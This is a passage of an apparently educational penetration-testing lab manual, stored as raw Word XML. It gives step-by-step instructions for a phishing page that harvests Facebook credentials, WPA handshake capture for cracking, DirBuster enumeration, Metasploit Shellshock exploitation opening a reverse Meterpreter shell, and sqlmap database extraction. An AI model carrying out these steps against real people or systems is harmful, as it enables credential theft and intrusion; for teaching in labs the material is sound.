                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId65"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="53530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10.Launch a web browser in Kali Linux and open an email service, as shown in Figure 12. 11.Compose an email and provide the target users email id in the To textbox, as shown in Figure </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533775"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="72"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3244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12.Click on the link icon. </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window will appear, as shown in Figure 13. </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13.Type a text in the Text to display textbox. (Figure 13) </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14.Click on the radio button Web address. (Figure 13) </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15.Type the fake URL https://facebook.com/ in the Web address text box. (Figure 13). </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16.Click on OK. (Figure 13)</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514725"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="93"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334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the text that you have typed will appear in the email body as a link, as shown in Figure 14.</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17.Click on Send. (Figure 14) </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571875"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="96"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53244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when the target user will open his email, he will find the link, as shown in Figure 15.</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114675"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="110"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53149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target user will click on the link, he/she will be presented with a replica of Facebook.com, as shown in Figure 16.</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2781300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="70"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5324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fake Facebook.com page will ask the target user to enter the email and password tor view the pictures. When the target user enters the credentials, the SET terminal of Kali Linux will fetch the email id and password</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5</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Practical on Wireless and Bluetooth attacks</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w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Crack WPA encryption using Aircraft-ng in Kali Linux. We will require the following: 1. Kali Linux as virtual machine 2. Web browser with Internet connection 3. Administrative privileges.</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crack a wireless network encrypted with WPA by using the following steps.</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in</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to Kali and launch the command terminal.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D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check if the wireless card is connected or not by using the ‘iwconfig’ command, as shown in figure.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D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2590800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="20"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2482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wireless interface into monitor mode using ‘airmon-ng start wlan0’ command with wlan0 as your wireless interface name.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D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3067050"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="33"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4768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‘airodump’ to find out the SSID on the interface using the command: ‘airodump-ng -write capture wlan0’. The screen will display a list of wifi networks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D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3390900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="35"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8293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following command to capture a 4-way handshake by using airmon-ng to monitor traffic on the target network using the channel and BSSID values.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E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‘airodump-ng -c 3 –bssid 9C:5C:XX:XX:XX:XX -w.wlan0’</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E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 3’ is used to specify the channel number 3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E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wait to capture the handshake packet. Once you have captured a packet, you will see the output similar to Figure</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E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9225" cy="3076575"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="11"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2292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see a captured .cap file in your /root location which is a default location.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E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run this captured file against a wordlist to crack the WPA key.</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6</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Practical on Exploiting Web-based applications</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w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We will demonstrate how to: Enumerate a webserver by finding files and directories using DirBuster. In order to carry out this lab, you will require the following: </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1.Administrator privileges 2.Kali Linux machine</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enumerate  a  webserver  by  finding  files  and  directories  using  DirBuster,  perform the following steps: </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1.Login to Kali Linux machine. </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2.Go to Applications -&gt; Kali Linux -&gt; Web Applications -&gt; Web Crawlers -&gt; dirbuster to launch DirBuster as shown in Figure 1.</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3781425"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="112" name="image115.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image115.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId75"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="33623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is launched, it opens in a GUI as shown in Figure 2.</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829050"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="26"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3625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3.Type the URL of the website you want to scan in the Target URL text field and the port number, as shown in Figure 3. </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800475"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="61"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53244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4.Click on List Info to open a wordlist to be used to find the directories and files as shown in Figure 4. </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781425"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="94"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53244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click on List Info, it opens a Brute Forcing List Information window listing all the available wordlists with a short description, as shown in Figure 5.</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3857625"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="124" name="image116.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image116.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId79"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="53625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5.Select a list you want to use and click on Browse to open that list, as shown in Figure 6. (You may need to download from github)</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771900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="68"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53149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6.It will open a Please Select The Directory/File List You Wish To Use window as shown in Figure 7.</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7.Browse where your file is saved and select the list by clicking on Select List, as shown in Figure 7. </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3810000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="89"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3816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8.Click on the Start button. When you click on Start, DirBuster starts generating GET requests and sending them to the selected URL with a request for each of the files and directories listed in the wordlist. Figure 8 shows the scan information.</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829050"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="98"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53530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DirBuster for some time, you will see the results in Tree View, as shown in Figure 9.</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819525"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="22"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3435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7</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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Practical on using Metasploit Framework for exploitation. </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 </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demonstrate how to: Exploit Shellshock vulnerability using Metasploit. In order to carry out this lab, we will require the following: 1.Administrator privileges 2.Kali Linux machine as VM 3.Windows 8.1 machine </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exploit vulnerability in a webserver using Metasploit, perform the following steps: 1.Open a web browser on the Windows 8.1 machine and type www.google.com in the URL. In the Google search bar, type shellshock vm and press Enter. It will give you a list of results. Open the result shown in Figure.</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686175"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="28"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531495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Scroll down the Pentesterlab page and click on here as shown in Figure, to download the ISO of a VM with Shellshock vulnerability</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724275"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="62"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31495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sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Open the VMWare Workstation Pro after the VM is downloaded and click on Create a New Virtual Machine as shown in Figure.</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4248150"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="9"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3054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start the New Virtual Machine Wizard as shown in Figure.</w:t>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Typical (recommended) radio button and click on Next, as shown in Figure</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000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1350" cy="3076575"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="126"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3181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It will open the Guest Operating System Installation window as shown in Figure</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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Browse and navigate to the ISO you have downloaded in Step 2. Click</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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Next as shown in Figure</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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25" cy="3095625"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="107" name="image118.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image118.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId88"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="313372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open a Select a guest operating system window as shown in Figure</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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Leave the options to default and click Next as shown in Figure</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25" cy="3076575"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="120" name="image110.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image110.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId89"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="31337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open the Name the virtual machine window as shown in Figure.</w:t>
      </w:r>
    </w:p>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shellshock in the Virtual Machine name: text box and click on Next as shown in</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2857500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="75"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3143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open a Specify Disk Capacity window as shown in Figure</w:t>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Leave the options to default and click on Next as shown in Figure</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Review the settings and click on Finish, as shown in Figure</w:t>
      </w:r>
    </w:p>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2775" cy="2933700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="115" name="image114.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image114.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId91"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3152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It will start installing the virtual machine. When the virtual machine will be</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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completely installed, it will show you a command-line window as shown in Figure.</w:t>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514725"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="90"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5334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Type the command ifconfig and press Enter to view the IP address configuration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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machine, as shown in Figure</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000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3752850"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="34"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52482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Switch and login to the Kali Linux VM. Open a web browser as shown in Figure</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000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305175"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1"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53244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Type http://192.168.0.109 and press Enter to check if the webs server is up and running, as shown in Figure. Here, 192.168.0.109 is the IP address of the shellshock VM.</w:t>
      </w:r>
    </w:p>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419475"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="128" name="image123.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image123.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId95"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="53530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Type http://192.168.0.109/cgi-bin/status and press Enter to check if there is a</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000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shellshock vulnerability in the webserver, as shown in Figure. If it shows an output as</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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in Figure, then there is a shellshock vulnerability</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448050"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="39"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3244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Open the Metasploit tool. It will open a window, as shown in Figure</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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3467100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="31"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52482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Type the command ‘use exploit/multi/http/apache_mod_cgi_bash_env_exec’ and press Enter to select the exploit, as shown in Figure</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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3533775"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2"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2006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20"/>
          <w:szCs w:val="20"/>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17.Set the lhost using the command ‘set LHOST 192.168.0.133’ and press Enter. The</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of the Kali Linux is 192.168.0.133, as shown in Figure.</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467100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="46"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5276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Set the rhost using the command ‘set RHOST 192.168.0.109’ and press Enter. The IP</w:t>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Shellshock VM is 192.168.0.109, as shown in Figure</w:t>
      </w:r>
    </w:p>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495675"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="117" name="image111.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image111.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId100"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="52578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Set the TargetURI using the command ‘set TARGETURI /cgi-bin/status’ and press Enter, as shown in Figure</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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3514725"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="45"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52482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Set the payload using the command ‘set payload linux/x86/meterpreter/reverse_tcp’, and press Enter, as shown in Figure</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514725"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="111"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52578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Type ‘exploit’ and press Enter to run the exploit in the background, as shown in Figure 102. It will open a Meterpreter session </w:t>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3467100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="74" name="image78.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image78.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId103"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5267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rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>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opened </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">meterpreter</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> session, you can perform the following tasks: View the files and directories located in the machine, Delete, upload and download files from the machine, Execute applications remotely,</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the processes,</w:t>
      </w:r>
    </w:p>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a shell,</w:t>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Reboot or shutdown the machine, etc.</w:t>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Type help and press Enter to view the help on the meterpreter commands, as</w:t>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in Figure</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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524250"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="99" name="image96.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image96.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId104"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="53530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Type arp and press Enter to view the ARP cache, as shown in Figure</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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3486150"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="113" name="image108.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image108.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId105"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="52959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Type ipconfig and press Enter to view the IP configuration, as shown in Figure</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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495675"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="24"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52768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8</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Practical on injecting Code in Data Driven Applications: SQL Injection</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w:t>
      </w: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demonstrate how to test a website for SQL injection vulnerability. In order to carry out this lab, we will require the following: 1.Administrator privileges 2.Web browser with Internet connection 3.Kali Linux</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a website for SQL injection vulnerability, perform the following steps: </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1.Log in to Kali Linux. </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2.Open a web browser and enter the URL of the website you want to exploit, as shown in Figure. </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4029075"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="52"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53244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URL, for example http://testphp.vulnweb.com/listproducts.php?cat=1,has a GET parameter as cat=1, then it is vulnerable to SQL injection attacks.</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You can check if your website is vulnerable by replacing the value 1 with * in GET parameter. If the website results in an error as shown in Figure 2, then it is vulnerable.</w:t>
      </w:r>
    </w:p>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295650"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="121" name="image127.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image127.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId108"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="53149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Open Terminal in Kali Linux as shown in Figure.</w:t>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457325"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="92" name="image91.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image91.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId109"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="36385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Type sqlmap -h and press Enter to view the help and the list of parameters passed in</w:t>
      </w:r>
    </w:p>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SQLMAP, as shown in Figure.</w:t>
      </w:r>
    </w:p>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876675"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="87"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52578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Type the following command and press Enter to list the information about the existing databases, as shown in Figure 5(a), Figure 5(b) and Figure 5(c). </w:t>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sqlmap -u </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://testphp.vulnweb.com/listproducts.php?cat=1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> –dbs</w:t>
      </w:r>
    </w:p>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N  when  SQLMAP  asks  to  skip  payload  for  other  databases  except  for  the</w:t>
      </w:r>
    </w:p>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database.</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N again when SQLMAP asks to include all tests.</w:t>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924300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="71"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3149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3886200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="100"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53435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3829050"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="101"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53054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output part-3, you can see the executed payloads, available databases and backend database version.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002C6">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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Type the following command and press Enter to list information about tables present</w:t>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particular database, as shown in Figure 6(a):</w:t>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sqlmap -u </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://testphp.vulnweb.com/listproducts.php?cat=1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -D acuart --tables</w:t>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6(a) and 6(b) displays the output.</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819525"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="41"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533400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876675"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="15" name="image14.png"/>
            <a:graphic>
